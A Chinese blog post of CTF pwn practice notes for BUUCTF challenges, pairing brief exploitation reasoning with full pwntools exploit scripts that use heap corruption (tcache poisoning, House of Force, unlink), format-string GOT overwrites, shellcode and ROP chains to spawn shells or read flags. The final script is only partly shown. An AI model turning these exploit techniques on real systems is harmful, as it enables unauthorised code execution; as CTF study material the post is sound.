---
title: buu刷题记录
date: 2021-07-31 22:54:59 +0800
categories:
  - ctf刷题
tags:
  - pwn
  - ctf
permalink: /posts/id=3/
pin: false
published:
---
这里是一些之前做的buu的题，还没整理，先放在这

## ciscn_2019_en_3

```python
from pwn import *
p = process("ciscn_2019_en_3")
libc = ELF('./libc-2.27.so')
elf = ELF('ciscn_2019_en_3')
def add(size,story):
    p.sendlineafter('choice:','1')
    p.sendlineafter('story:',str(size))
    p.sendlineafter('story:',story)

def delete(idx):
    p.sendlineafter('choice:','4')
    p.sendlineafter('index:',str(idx))


p.sendlineafter('name?','aaaaaa')
p.sendlineafter('ID.','2'*8)
libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-231-libc.sym['setbuffer']
free_hook=libcbase+libc.sym['__free_hook']
system=libcbase+libc.sym['system']
add(0x20,'aaaa')
add(0x20,'/bin/sh\x00')
delete(0)
delete(0)
add(0x20,p64(free_hook))
add(0x20,'dd')
add(0x20,p64(system))
delete(1)
p.interactive()
```

## ciscn_2019_final_5
这题和之前的堆题感觉难度都不是一个档次，出的很好
不管是泄露还是利用都很考思路
漏洞点主要是利用got表覆写

题目是partial relro 和 pie，可能会利用got表覆写
然后看到atoi，想把他改成system然后实现利用

那libc泄露呢，edit 和 delete 都是依照低四位代表的index进行修改，观察到如果用第四位来储存我们选择的index，16会覆盖高四位，且导致第四位为0，即变成index为0，同时ptr数组记录的地址为源地址+0x10

可以利用这一点实现overwrite，修改size和fd，从而达到任意地址写
我们要泄露libc就需要输出，考虑到add里的输出只是输出最后三个十六进制数不行
所以还是考虑覆写free_got
所以我们申请到ptr处，操控ptr/size2个数组，利用给到的功能实现覆写

```python
from pwn import *

p = process("./ciscn_final_5")

# context.log_level = 'debug'
elf = ELF("./ciscn_final_5")
libc = ELF('./libc-2.27.so')

s       = lambda data               :p.send(data)
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(data)
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda name,data          :p.success(name + "-> 0x%x" % data)

content = 0x6020e0
free_got = 0x602018
puts_plt = 0x400790
puts_got = 0x602020
atoi_got = 0x602078

def cmd(choice):
    sla("your choice: ",choice)
def add(index, size, content):
    cmd(1)
    sla("index: ",index)
    sla("size: ",size)
    p.sendafter("content: ",content)

def delete(index):
    cmd(2)
    sla("index: ",index)

def edit(index, content):
    cmd(3)
    sla("index: ",index)
    p.sendafter("content: ",content)

def dbg():
    gdb.attach(r)
    pause()

add(16,0x10,p64(0)+p64(0x61))# make overwrite
add(1,0xc0,'a')# size of aim chunk
delete(0)
delete(1)

add(2,0x50,p64(0)+p64(0x21)+p64(content))# fix chunk1 fd

add(3,0xc0,'a')
add(4,0xc0,p64(free_got)+p64(puts_got+1)+p64(atoi_got-4)+p64(0)*17+p32(0x10)*8)
edit(8,p64(puts_plt)*2)
delete(1)
puts = u64(p.recv(6).ljust(8,'\x00'))
lg("puts",puts)
libc_base = puts - libc.sym['puts']
system = libc_base + libc.sym['system']

edit(4, p64(system)*2)

sla("your choice: ",'/bin/sh\x00')
p.interactive()
```

## de1ctf_2019_weapon
这题其实挺基础的，有UAF，没有show，考虑IO_FILE泄露libc
因为有UAF，所以可以用overlap来伪造一个chunk实现踩unsortbin
有几个点
  1.add最大只能申请0x60，所以最后踩unsortbin的时候要考虑到踩到以后去申请不了的问题，同时构造一个fastbin的同fd链表，在chunk大小上要注意
  2.overlap要考虑到fastbin检测吧，stdout劫持也是。因为是ubuntu16
```python
from pwn import *

#p = process("./de1ctf_2019_weapon")
#p = remote('node4.buuoj.cn','27248')
# context.log_level = 'debug'
elf = ELF("./de1ctf_2019_weapon")
libc = ELF('./libc-2.23.so')
gadgets = [0x45216,0x4526a,0xf02a4,0xf1147]
s       = lambda data               :p.send(data)
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(data)
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7",timeout = 1)[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f",timeout = 1)[-6:].ljust(8,"\x00"))
lg      = lambda name,data          :p.success(name + "-> 0x%x" % data)

def cmd(choice):
    sla('choice >> ',choice)

def add(idx,size,content):
    cmd(1)
    sla('wlecome input your size of weapon: ',size)
    sla('input index: ',idx)
    p.sendafter('input your name:',content)

def edit(idx,content):
    cmd(3)
    sla('input idx:',idx)
    p.sendafter('new content:',content)

def delete(idx):
    cmd(2)
    sla('input idx :',idx)

def dbg():
    gdb.attach(p)
    pause()

def pwn():

    add(0,0x30,'a')
    add(1,0x30,'a')
    add(2,0x30,'a'*0x20 + p64(0xa0)+p64(0x21))
    add(3,0x10,p64(0x20)+p64(0x21))
    edit(0,p64(0)+p64(0x41))
    delete(2)
    delete(1)
    edit(1,'\x10')
    add(1,0x30,'a')
    add(2,0x30,'a')
    edit(0,p64(0)+p64(0x71))
    delete(2)
    edit(0,p64(0)+p64(0xa1))
    delete(2)
    edit(0,p64(0)+p64(0x71))
    edit(2,p8(0xdd)+p8(0x65))
    add(2,0x60,'a')
    add(4,0x60,'a'*51 + p64(0xfbad1800)+p64(0)*3 + p8(0x58))

    libc_leak = uu64()
    lg('libc_leak',libc_leak)
    libc_base = libc_leak - 0x3C56A3#gdb
    lg('libc_base',libc_base)
    if((libc_base&0xfff)!= 0):
        exit(-1)
    malloc_hook = libc_base + libc.sym['__malloc_hook']
    one_gadget = gadgets[3]+libc_base
    add(5,0x60,'a')
    delete(5)
    edit(5,p64(malloc_hook-0x23))
    add(6,0x60,'a')
    add(7,0x60,'a'*0x13 + p64(one_gadget))

    cmd(1)
    sla('wlecome input your size of weapon: ',0x10)
    sla('input index: ',8)


if __name__ == '__main__':
    while(True):
        try:
            # p = process('./de1ctf_2019_weapon')
            p = remote('node4.buuoj.cn','28089')
            pwn()
            p.interactive()
            break
        except:
            p.close()
            continue
```

## gyctf_2020_force
看了下ida，add和show2个方法，show没用，add 1.没有size限制 2.固定0x50写入 3.还会print出堆地址，利用mmap分配机制，创建大chunk，计算偏移动态得到libc地址

然后就是想任意地址写，去把malloc_hook写了
满足HOF条件
1.可控制创建chunk大小
2.能溢出修改topchunk大小
利用HOF实现任意地址写
```python
from pwn import *
from LibcSearcher import *

context(log_level = 'debug')

#p = process('gyctf_2020_force')
p = remote('node4.buuoj.cn',28871)
elf = ELF('./gyctf_2020_force')
libc = ELF('./libc-2.23.so')

s       = lambda data               :p.send(data)
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(data)
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda name,data          :p.success(name + "-> 0x%x" % data)

def dbg():
    gdb.attach(p)
    pause()

def add(size,content):
    sla('2:puts\n',1)
    sla('size\n',size)
    addr = int(p.recvuntil('\n')[-16:-1],16)
    sla('content\n',content)
    return addr

def show():
    sla('2:puts\n',2)


gadget = [0x45216,0x4526a,0xf02a4,0xf1147]
offset = add(0x200000,'aaa')
libc_base = 0x200ff0 + offset


# libc calc
malloc_hook = libc_base + libc.sym['__malloc_hook']
realloc = libc_base + libc.sym['realloc']
one_gadget = gadget[1]+libc_base


top = add(0x10,p64(0)+p64(0)+p64(0)+p64(0xffffffffffffffff))+0x10
calc = malloc_hook - top - 0x33
add(calc,'aaa\n')
add(0x10,'a'*0x8+p64(one_gadget)+p64(realloc+0x10))

sla('2:puts\n','1')
sla('size\n','0x20')
p.interactive()
```

## gyctf_2020_signin
calloc不分配tachebin，所以利用tachebin机制构造一个空位，将0x4040c0-0x10放进去，这样fd指针即0x4040c0就有值了
backdoor函数只要ptr有值就能getshell
就是不知道为啥不能利用uaf直接来申请一个ptr位置得堆块，在tache中构造时发现申请不了，希望懂的师傅告诉我一下

```python
from pwn import *

context.log_level = 'debug'

p = process('gyctf_2020_signin')
elf = ELF('gyctf_2020_signin')

def cmd(choice):
    p.sendlineafter('your choice?',str(choice))
def add(idx):
    cmd(1)
    p.sendlineafter('idx?\n',str(idx))
def edit(idx,content):
    cmd(2)
    p.sendlineafter('idx?\n',str(idx))
    p.sendline(content)
def delete(idx):
    cmd(3)
    p.sendlineafter('idx?\n',str(idx))
def backdoor():
    cmd(6)

add(0)
add(1)
add(2)
add(3)
add(4)
add(5)
add(6)
add(7)
delete(0)
delete(1)
delete(2)
delete(3)
delete(4)
delete(5)
delete(6)
delete(7)
edit(7,p64(0x4040C0-0x10))
add(8)
backdoor()

p.interactive()
```

## gyctf_2020_some_thing_interesting
经典的堆题设置，在delete处没有置0
通过格式化字符串泄露libc，然后覆盖malloc为onegadget实现getshell

但UAF构造时会报错，不知道为什么
doublefree也需要间隔一个

```python
from pwn import *
from LibcSearcher import *

context.log_level = 'debug'

#p = process('gyctf_2020_some_thing_interesting')
p = remote('node4.buuoj.cn','26405')
elf = ELF('gyctf_2020_some_thing_interesting')
libc = ELF('./libc-2.23.so')
gadget = [0x45216,0x4526a,0xf02a4,0xf1147]

def cmd(choice):
    p.sendlineafter('> Now please tell me what you want to do :',str(choice))
def check():
    cmd(0)    
def add(Osize,O,REsize,RE):
    cmd(1)
    p.sendlineafter("> O's length : ",str(Osize))
    p.sendlineafter("> O : ",str(O))
    p.sendlineafter("> RE's length : ",str(REsize))
    p.sendlineafter("> RE : ",str(RE))

def edit(idx,O,RE):
    cmd(2)
    p.sendlineafter("> Oreo ID : ",str(idx))
    p.sendlineafter("> O : ",str(O))
    p.sendlineafter("> RE : ",str(RE))

def delete(idx):
    cmd(3)
    p.sendlineafter("> Oreo ID : ",str(idx))
def show(idx):
    cmd(4)
    p.sendlineafter("> Oreo ID : ",str(idx))

def dbg():
    gdb.attach(p)
    pause()

p.sendlineafter('> Input your code please:','OreOOrereOOreO%17$p')
check()
p.recvuntil('0x')
__libc_start_main_addr = int(p.recv(12),16)- 0xf0
print hex(__libc_start_main_addr)
libc_base = __libc_start_main_addr - libc.sym['__libc_start_main']

malloc_hook = libc_base + libc.sym['__malloc_hook']
realloc_hook = libc_base + libc.sym['__realloc_hook']
one_gadget = libc_base +gadget[3]

add(0x68,'aaa',0x20,'aaa')
add(0x68,'aaa',0x20,'aaa')
delete(1)
delete(2)
delete(1)
add(0x68,p64(malloc_hook-0x23),0x68,p64(0))
add(0x68,p64(0),0x68,'a'*0x13+p64(one_gadget))
cmd(1)
p.sendlineafter("> O's length : ",str(0x68))
p.interactive()
```

## jarvisoj_level6_x64
一道unlink，有doublefree漏洞，没有PIE，明显的覆盖got表
edit是一个realloc，可以堆溢出
所以考虑unlink，控制记录chunk表
然后就是一个调试的时候发现的地方chunk0的size为0x120，所以后来realloc时就填充0x120个字节

unlink就是伪造chunk，然后free实现向上合并，从而实现往目标地址写入一个目标地址附近的值
用来实现某一地址写的目的，常用来实现got表的覆写

```python
from pwn import *
p = process('freenote_x64')
context.log_level = 'debug'
# p = remote('node4.buuoj.cn','27658')
elf=ELF('./freenote_x64')
libc = ELF('./libc-2.23.so')

s       = lambda data               :p.send(data)
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(data)
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f",timeout = 1)[-6:].ljust(8,"\x00"))
lg      = lambda name,data          :p.success(name + "-> 0x%x" % data)

def cmd(choice):
	sla('Your choice: ',choice)
def show():
	cmd(1)
def add(content):
	cmd(2)
	sla('Length of new note: ',len(content))
	sla('Enter your note: ',content)
def edit(idx,content):
	cmd(3)
	sla('Note number: ',idx)
	sla('Length of note: ',len(content))
	sla('Enter your note: ',content)
def delete(idx):
	cmd(4)
	sla('Note number: ',idx)
def dbg():
	gdb.attach(p)
	pause()

add('a'*0x80)
add('b'*0x80)#1
add('c'*0x80)
add('d'*0x80)#3

delete(0)
delete(2)

add('xxxxxxxx')#0
add('pppppppp')#2
show()

p.recvuntil('xxxxxxxx') 
heap_addr= u64(p.recvuntil('\x0a')[:-1].ljust(8,'\x00'))
p.recvuntil('pppppppp')
libc_base =u64(p.recvuntil('\x0a')[:-1].ljust(8,'\x00')) - 88 - 0x3C4B20

lg('libc_base',libc_base)
heap_head=heap_addr-0x1940
lg('heap_head',heap_head)

chunk0 = heap_head+0x30
print hex(heap_addr)
delete(1)
delete(2)
delete(3)
#unlink
payload = p64(0x0)+p64(0x81)+p64(chunk0-0x18)+p64(chunk0-0x10) 
payload +='a'*0x60
payload += p64(0x80)+p64(0x90)
payload +='a'*0x80+p64(0x90)+p64(0x121)
edit(0,payload)

delete(1)
#free_got->system
# dbg()
free_got=elf.got['free']
payload =p64(4)+p64(1)+p64(0x8)+p64(free_got)
payload +=p64(1)+p64(0x8)+p64(heap_addr)
payload +=p64(1)+p64(0x8)+p64(elf.got['atoi'])
payload = payload.ljust(0x120,'\x00')#dbg chunk0
edit(0,payload)

atoi_addr= libc.sym['atoi'] + libc_base
system_addr=libc.sym['system'] + libc_base

edit(0,p64(system_addr))

edit(1,"/bin/sh\x00")
delete(1)
p.interactive()
```

## picoctf_2018_are you root
算是堆题的思路，reset时没有置空授权码，发现输入ID时可以溢出到授权码
```python
from pwn import *
 
p = remote('node4.buuoj.cn','28016')
 
def login(name):
   p.sendlineafter('>','login ' + name)
 
def reset():
   p.sendlineafter('>','reset')
 
def getFlag():
   p.sendlineafter('>','get-flag')
 
login('a'*0x8 + p64(0x5))
reset()
login('aaa')
getFlag()
 
p.interactive()
```

## picoctf_2018_buffer overflow
ssh连接后发现一个vlun的程序
结合IDA反编译结果signal函数，当对内存错误读写时，printflag
arg[1]直接在程序后边写，得到flag

![image.png](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/26177342-c7a0f766fdbcd8c1.png)
![image.png](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/26177342-3565e914a194be1b.png)

## roarctf_2019_realloc_magic
劫持stdout获取libc的一道题，有点小难
结合realloc机制，很多套路技巧
熟悉了低位爆破的方法
0x41是为了防止free时又回到0x110的tcache序列里，导致无法realloc stdout


参考了几篇不错的WP
[探究利用_IO_2_1_stout_泄露libc – Railgun's Blog (pwn4fun.com)](http://www.pwn4fun.com/pwn/io-2-1-stdout-leak-libc.html)
[ BUUCTF-PWN roarctf_2019_realloc_magic（tcache attack，块重叠，劫持_IO_2_1_stdout_泄露libc）_L.o.W的博客-CSDN博客](https://blog.csdn.net/weixin_44145820/article/details/105585889)

```python
from pwn import *
from LibcSearcher import *

# context(os='linux',arch='amd64',log_level='debug')

s       = lambda data               :p.send(data)
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(data)
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda name,data          :p.success(name + "-> 0x%x" % data)



# p = remote('node4.buuoj.cn','27175')
elf = ELF('roarctf_2019_realloc_magic')
libc = ELF('./libc-2.27.so')
gadget = [0x4f2c5,0x4f322,0x10a38c]

def cmd(choice):
    sla('>> ',choice)

def re(size,content):
    cmd(1)
    sla('Size?',size)
    p.sendafter('Content?',content)

def delete():
    cmd(2)

def setnull():
    cmd(666)

def dbg():
    gdb.attach(p)
    pause()
    

def pwn():
    re(0x70,'a')
    re(0,'')
    re(0x100,'b')
    re(0,'')
    re(0xa0,'c')
    re(0,'')

    re(0x100,'b')
    delete()
    delete()
    delete()
    delete()
    delete()
    delete()
    delete()
    re(0,'')
    re(0x70,'a')
    re(0x180,'a'*0x78+p64(0x41)+p8(0x60)+p8(0x87))
    re(0,'')
    re(0x100,'a')
    re(0,'')
    re(0x100,p64(0xfbad1887)+p64(0)*3+p8(0x58))

    libc_base = u64(p.recvuntil('\x7f',timeout = 1)[-6:].ljust(8,'\x00'))-0x3e82a0
    if libc_base == - 0x3e82a0 :
        exit(-1)
    lg('libc_base',libc_base)
    free_hook = libc_base + libc.sym['__free_hook']
    system = libc_base + libc.sym['system']
    one_gadget=libc_base + gadget[1]

    setnull()
    re(0x120,'a')
    re(0,'')
    re(0x130,'b')
    re(0,'')
    re(0x140,'c')
    re(0,'')
    re(0x130,'b')
    delete()
    delete()
    delete()
    delete()
    delete()
    delete()
    delete()
    re(0,'')
    re(0x120,'a')
    re(0x260,'a'*0x128+p64(0x41)+p64(free_hook-8))
    re(0,'')
    re(0x130,'a')
    re(0,'')
    re(0x130,'/bin/sh\x00'+p64(system))
    delete()
    p.interactive()

if __name__ == '__main__':
    while True:
        p = process('roarctf_2019_realloc_magic')
        try:
            pwn()
        except:
            p.close()
```

## sctf_2019_easy_heap
又学知识了，关于overlap的使用，还可以构造doublefree，实现任意地址写
这道题让我又重新审视了一下overlap的作用
1.unsortbinattack->stdout劫持(修改地址后几位可实现部分地址写)
2.doublefree->实现任意地址写
这道题的关键点在于offbynull，从overlap入手，写hook
题目开了个很大的空间，那我们就写shellcode
再利用overlap实现unsortbinattack，修改到mallochook
不用泄露libc
```python
from pwn import *

p = process("./sctf_2019_easy_heap")
#p = remote('node4.buuoj.cn',25072)
context.log_level = 'debug'
elf = ELF("./sctf_2019_easy_heap")
libc = ELF('./libc-2.27.so')
context(arch = 'amd64',os = 'linux')

s       = lambda data               :p.send(data)
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(data)
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f",timeout = 1)[-6:].ljust(8,"\x00"))
lg      = lambda name,data          :p.success(name + "-> 0x%x" % data)


def dbg():
	gdb.attach(p)

def cmd(choice):
	sla('>> ',choice)

def add(size):
	cmd(1)
	sla('Size: ',size)
def delete(idx):
	cmd(2)
	sla('Index: ',idx)
def edit(idx,content):
	cmd(3)
	sla('Index: ',idx)
	sla('Content: ',content)

p.recvuntil('0x')
mmap = int(p.recv(10),16)
lg('mmap',mmap)

add(0x410)
add(0x68)
add(0x4f0)
add(0x68)

delete(0)
edit(1,'a'*0x60+p64(0x490))
delete(2)

add(0x410)
add(0x68)

delete(3)
delete(1)
delete(2)

add(0x68)#1
edit(1,p64(mmap))
add(0x68)#2
add(0x68)#3

shellcode = asm(shellcraft.sh())
edit(3,shellcode)

add(0x4f0)#4
delete(0)
edit(1,'a'*0x60+p64(0x490))
delete(1)
delete(4)
add(0x410)#0
edit(2,'\x30')
add(0x68)#1
add(0x68)#4

edit(4,p64(mmap))
dbg()
add(0x20)
p.interactive()
```

## SWPUCTF_2019_login
这题经典的非栈上格式化字符串，之前做了一道堆的，现在这道是往bss段写
但都是要利用ebp链表去改导向
看到可以写got表，没有金丝雀，也没有偏移，初步准备泄露libc，然后写printf

泄露比较简单
写地址的话要注意的点就是在写地址的时候注意不要一次性n输入，会造成大量数据输入失败。hhn逐字节输入。

```python
from pwn import *

#p = process("./SWPUCTF_2019_login")
p = remote('node4.buuoj.cn',28591)
# context.log_level = 'debug'
elf = ELF("./SWPUCTF_2019_login")
libc = ELF('./libc-2.27-32.so')

s       = lambda data               :p.send(data)
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(data)
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f",timeout = 1)[-6:].ljust(8,"\x00"))
lg      = lambda name,data          :p.success(name + "-> 0x%x" % data)
def dbg():
	gdb.attach(p)
# leak libc
sla('Please input your name: ','mo')
sla('Please input your password: ','%15$p')
p.recvuntil('0x')
libc_start_main = int(p.recvuntil('\n'),16)-0xf1
lg('libc_start_main',libc_start_main)
libc_base = libc_start_main - libc.sym['__libc_start_main']
lg('libc_base',libc_base)
system_addr = libc.sym['system'] + libc_base
lg('system',system_addr)


printf_got = elf.got['printf']# 0x804b014
lg('printf_got',printf_got)
sla('Try again!','%6$p')
p.recvuntil('0x')
stack_6 = int(p.recvuntil('\n'),16)
lg('stack_6',stack_6)
sla('Try again!','%10$p')
p.recvuntil('0x')
stack_10 = int(p.recvuntil('\n'),16)
lg('stack_10',stack_10)

#add printf got
pl = '%'+ str(0x14) + 'c%10$hhn'
sla('Try again!',pl)

pl = '%' + str((stack_10 & 0xFF) + 1) + 'c%6$hhn'  
sla('Try again!',pl)
pl = '%' + str(0xB0) + 'c%10$hhn'  
sla('Try again!\n',pl)

pl = '%' + str((stack_10 & 0xFF) + 2) + 'c%6$hhn' 
sla('Try again!\n',pl)
pl = '%' + str(0x04) + 'c%10$hhn'  
sla('Try again!\n',pl)

pl = '%' + str((stack_10 & 0xFF) + 3) + 'c%6$hhn' 
sla('Try again!\n',pl)
pl = '%' + str(0x08) + 'c%10$hhn'  
sla('Try again!\n',pl)
#add printf got+1(edit printf_got bitbybit))
pl = '%' + str((stack_10 & 0xFF) + 4) + 'c%6$hhn'
sla('Try again!\n',pl)
pl = '%' + str(0x15) + 'c%10$hhn'
sla('Try again!\n',pl)

pl = '%' + str((stack_10 & 0xFF) + 5) + 'c%6$hhn'  
sla('Try again!',pl)
pl = '%' + str(0xb0) + 'c%10$hhn'  
sla('Try again!\n',pl)

pl = '%' + str((stack_10 & 0xFF) + 6) + 'c%6$hhn' 
sla('Try again!\n',pl)
pl = '%' + str(0x04) + 'c%10$hhn'  
sla('Try again!\n',pl)

pl = '%' + str((stack_10 & 0xFF) + 7) + 'c%6$hhn' 
sla('Try again!\n',pl)
pl = '%' + str(0x08) + 'c%10$hhn'  
sla('Try again!\n',pl)

# cover printf to system
# reset
pl = '%' + str((stack_10 & 0xFF)) + 'c%6$hhn'
sla('Try again!\n',pl)

pl  ='%' + str(system_addr & 0xFF) + 'c%14$hhn'
pl +='%' + str((((system_addr & 0xFFFF00)>>8))-0x10)+'c%15$hn'
sla('Try again!\n',pl)
sla('Try again!\n','/bin/sh\x00')

p.interactive()
```

## SWPUCTF_2019_p1KkHeap
全开沙箱题，只能考虑跑shellcode，发现程序开了一块大的空间可以写shellcode
思路就是写进去然后把地址替换给mallochook

libc泄露，利用tcache的个数位为无符号数，-1>7，free到unsortbin，泄露fd
至于申请额外的空间，有UAF能够修改fd
但操作中发现，只能free三次，导致如果用这种方法，我们只能攻击一次，攻击了malloc_hook后，就攻击不了0x66660000
所以尝试攻击一次去拿tcache_entry，然后修改tcachebin，达到任意地址写

```python
from pwn import *

#p = process("./SWPUCTF_2019_p1KkHeap")
p = remote('node4.buuoj.cn','27248')
context.arch='amd64'
# context.log_level = 'debug'
elf = ELF("./SWPUCTF_2019_p1KkHeap")
libc = ELF('./libc-2.27.so')

s       = lambda data               :p.send(data)
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(data)
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda name,data          :p.success(name + "-> 0x%x" % data)

def cmd(choice):
    sla('Your Choice: ',choice)

def add(size):
    cmd(1)
    sla('size: ',size)
def edit(idx,content):
    cmd(3)
    sla('id: ',idx)
    p.sendafter('content: ',content)

def show(idx):
    cmd(2)
    sla('id: ',idx)

def delete(idx):
    cmd(4)
    sla('id: ',idx)

def dbg():
    gdb.attach(p)
    pause()

#tcache entry attack
add(0x100)
add(0x100)
delete(1)
delete(1)
show(1)
p.recvuntil('content: ')
first_chunk=u64(p.recv(6).ljust(8,'\x00'))
tcache_entry=first_chunk- 0x10 - 0x110 - 0x250 + 0xc8
lg('tcache_entry',tcache_entry)

add(0x100)
edit(2,p64(tcache_entry))
add(0x100)
add(0x100)
rwx_addr=0x66660000
edit(4,p64(rwx_addr))
add(0x100)

shellcode = shellcraft.amd64.open('flag')
shellcode += shellcraft.amd64.read(3,0x66660300,64)
shellcode += shellcraft.amd64.write(1,0x66660300,64)
edit(5,asm(shellcode))

delete(0)
show(0)
main_arena = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
libc_base = main_arena - 0x3ebca0
malloc_hook = libc.sym['__malloc_hook'] + libc_base
edit(4,p64(malloc_hook))
add(0x100)
edit(6,p64(rwx_addr))

add(0x100)
p.interactive()
```

## 2020 新春红包题3
这题很奇怪，感觉没问题，也绕过了，但就是打不通，不知道问题在哪
```python
from pwn import *

#p = process("./RedPacket_SoEasyPwn1")
p = remote('node4.buuoj.cn',29013)
# context.log_level = 'debug'
elf = ELF("./RedPacket_SoEasyPwn1")
libc = ELF('./libc-2.29.so')

s       = lambda data               :p.send(data)
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(data)
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7",timeout = 1)[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f",timeout = 1)[-6:].ljust(8,"\x00"))
lg      = lambda name,data          :p.success(name + "-> 0x%x" % data)

def cmd(choice):
    sla('Your input: ',choice)

def add(idx,size,content):
    cmd(1)
    sla('Please input the red packet idx: ',idx)
    sla('How much do you want?(1.0x10 2.0xf0 3.0x300 4.0x400): ',size)
    p.sendafter('Please input content: ',content)

def edit(idx,content):
    cmd(3)
    sla('Please input the red packet idx: ',idx)
    p.sendafter('Please input content: ',content)

def delete(idx):
    cmd(2)
    sla('Please input the red packet idx: ',idx)

def show(idx):
    cmd(4)
    sla('Please input the red packet idx: ',idx)

def dbg():
    gdb.attach(p)
    pause()

for i in range (0,6):
    add(i,2,'a')
    delete(i)
for i in range(0,8):
    add(i,4,'a')
add(8,1,'a')

for i in range(0,8):
    delete(i)

show(6)
heap_head = u64(p.recv(6).ljust(8,'\x00')) - 0x26c0 -0x600
lg('heap_head',heap_head)

show(7)
libc_base = uu64() - 96 - 0x1E4C40
lg('libc_base',libc_base)

read_addr = libc.sym['read'] + libc_base
open_addr = libc.sym['open'] + libc_base
write_addr = libc.sym['write'] + libc_base

#tcache smash
# make background
#chunk1
add(3,3,'a')
#chunk2
add(1,4,'a')
add(2,4,'a')
delete(1)
add(4,3,'a')
add(5,3,'a')
#attack
edit(1,'a'*0x300 + p64(0) + p64(0x101) + p64(heap_head + 0x37e0) + p64(heap_head + 0x250 + 0x10 + 0x800 - 0x10))
add(6,2,'a')

pop_rdi_ret = 0x0000000000026542 + libc_base
pop_rsi_ret = 0x0000000000026f9e + libc_base
pop_rdx_ret = 0x000000000012bda6 + libc_base
leave_ret   = 0x0000000000058373 + libc_base

shell  = p64(pop_rdi_ret) + p64(heap_head + 0x004440) + p64(pop_rsi_ret) + p64(0) + p64(pop_rdx_ret)+ p64(0)
shell += p64(open_addr)
shell += p64(pop_rdi_ret) + p64(3) + p64(pop_rsi_ret)+p64(heap_head+0x260) + p64(pop_rdx_ret)+ p64(0x100)
shell += p64(read_addr)
shell += p64(pop_rdi_ret) + p64(1) + p64(pop_rsi_ret)+p64(heap_head+0x260) + p64(pop_rdx_ret)+ p64(0x100)
shell += p64(write_addr)
add(7,4,"flag.txt")
add(8,4,shell)
cmd(666)
pl = 'a'*0x80 + p64(heap_head + 0x004840 + 8)+ p64(leave_ret)
p.recvuntil('What do you want to say?')
p.send(pl)
p.interactive()
```

##  wdb2018_guess
IDA解析发现有get函数可以溢出，但有金丝雀
flag被加载到了栈上
在测试程序时发现触发金丝雀会有报错提示，显示程序文件名
由于这个文件名也在栈上，所以可以覆盖其栈值，达成一个print效果
如果把flag覆盖其值就可以printflag了

首先我们要知道这个调用文件名的值与我们输入s2的距离，通过gdb调试可以知道为0x128
然后我们要知道flag的栈地址，flag就是buf，在strcmp时会读到栈上，我们再找一个栈地址计算对应差值就可以在偏移下得到flag的栈地址
environ函数储存了加载的环境变量的地址如图。
0x7ffe0ddbd4d83-0x7ffe0ddbd370 = 0x168
那environ函数的真实地址怎么得呢，泄露libc就解决了，毕竟有一个print功能
再用这个print功能打印出一个储存环境变量的栈地址，问题就解决了


![关于environ](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/26177342-0f9d9838134a44e4.png)

```python
from pwn import *
from LibcSearcher import *

# p = process('GUESS')
p = remote('node4.buuoj.cn',25860)
elf = ELF('GUESS')

puts_got = elf.got['puts']
pl = 'a'*0x128 + p64(puts_got)
p.sendlineafter('Please type your guessing flag',pl)
